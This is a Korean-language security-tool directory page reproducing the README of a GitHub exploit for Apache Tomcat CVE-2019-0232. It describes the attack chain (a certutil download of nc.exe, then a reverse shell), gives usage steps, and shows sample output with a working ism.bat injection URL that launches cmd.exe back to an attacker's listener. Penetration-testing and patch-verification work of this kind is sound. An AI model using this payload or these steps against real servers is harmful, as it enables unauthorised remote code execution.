Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-0232 — 안녕하세요, 이것은 CVE-2019-0232를 위한 수정 및 개선된 코드입니다. | Kitploit
도구/GitHubGitHub/dharan10/cve-2019-0232
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubdharan10/cve-2019-0232

CVE-2019-0232

안녕하세요, 이것은 CVE-2019-0232를 위한 수정 및 개선된 코드입니다.

저장소 보기
221년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Apache Tomcat CVE-2019-0232 익스플로잇

이 스크립트는 Apache Tomcat의 CVE-2019-0232 취약점을 악용합니다. 이 취약점은 ism.bat 스크립트의 부적절한 처리로 인해 원격 코드 실행이 가능합니다. 이 스크립트는 certutil 및 nc.exe(Netcat)를 사용한 리버스 쉘 기법을 활용하여 취약한 시스템에 대한 원격 접근을 획득합니다.

취약점 개요:

  • CVE ID: CVE-2019-0232
  • 영향받는 제품: Apache Tomcat 6.x, 7.x, 8.x, 9.x
  • 설명:
    • CVE-2019-0232는 Apache Tomcat의 ism.bat에 대한 요청 처리 과정에서 발생하는 취약점으로, 공격자가 서버에서 임의의 명령을 실행할 수 있게 합니다. 이 취약점은 사용자 입력에 대한 적절한 검증이 부족하여 발생하며, 공격자는 특수하게 조작된 요청을 통해 임의 명령 실행을 트리거할 수 있습니다.
    • 이 취약점은 원격 서버에서 악성 nc.exe 파일을 다운로드하고 이를 사용하여 리버스 쉘을 생성하는 데 악용될 수 있습니다.

요구 사항:

  • Python 3: 스크립트는 Python 3.x용으로 설계되었습니다.
  • Netcat: 리버스 쉘 연결을 위해 Netcat 리스너(nc.exe)가 서버에 호스팅되어 있어야 합니다.
  • Apache Tomcat: 대상 서버는 CVE-2019-0232에 취약한 Apache Tomcat 버전(6.x, 7.x, 8.x, 9.x)을 실행 중이어야 합니다.

작동 방식:

  1. nc.exe 다운로드: 스크립트는 취약한 Tomcat 서버에 조작된 요청을 보내 certutil을 사용하여 대상 머신에 nc.exe(Netcat) 파일을 다운로드합니다.
  2. 리버스 쉘: nc.exe가 다운로드되면, 리버스 쉘 명령을 실행하기 위해 또 다른 요청이 전송되며, 이는 공격자의 Netcat 리스너로 다시 연결됩니다.

사용법:

1. 저장소 클론:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. 스크립트 편집 또는 사용자 입력으로 실행:

root@kitploit:~
python3 exploit.py

3. 다음 세부 정보를 입력하라는 메시지가 표시됩니다:

root@kitploit:~
Target Host: 익스플로잇할 Apache Tomcat 서버의 IP 주소.
Target Port: 대상 서버의 포트 (기본값: 8080).
Server IP: nc.exe를 호스팅하는 서버의 IP 주소.
Server Port: nc.exe가 호스팅된 포트 번호 (기본값: 80).
Netcat Listener IP: 리버스 쉘을 수신할 사용자의 IP 주소.
Netcat Listener Port: 리버스 쉘을 수신 중인 포트.

예시:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

성공적으로 실행되면 Netcat 리스너로 리버스 쉘 연결이 생성됩니다.

고지사항:

이 스크립트는 교육 목적으로만 제공됩니다. 악의적인 활동에 사용하지 마십시오. 침투 테스트 또는 보안 감사를 수행하기 전에 항상 적절한 권한을 얻으십시오. 이 스크립트의 오용은 법적 결과를 초래할 수 있습니다.

중요 참고 사항:

이 익스플로잇을 사용하기 전에 Apache Tomcat 서버가 CVE-2019-0232에 대해 패치되지 않았는지 확인하십시오. 스크립트는 대상 시스템의 구성에 따라 관리자 권한이 필요할 수 있습니다.

작성자:

작성자: A!Z3N(Dharan) 파워로 제작됨!

라이선스:

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.

그러나 사용에 따른 책임은 본인에게 있습니다. 이 코드는 교육 목적으로만 제공됩니다. 이 코드를 사용함으로써, 귀하는 사용으로 인한 모든 결과에 대해 전적인 책임을 진다는 데 동의합니다. 이 익스플로잇의 오용 또는 무단 사용은 법적 결과를 초래할 수 있습니다. 모든 시스템에 보안 테스트 또는 침투 테스트를 수행하기 전에 항상 적절한 권한을 얻으십시오.

이 코드는 자유롭게 사용, 수정 및 배포할 수 있지만, 윤리적 목적으로만 사용해야 합니다. 작성자는 이 코드로 인해 발생하는 어떠한 손해에 대해서도 책임을 지지 않습니다.

대상 시스템 소유자의 명시적 허가 없이 이 익스플로잇을 사용하지 마십시오.

도구 다운로드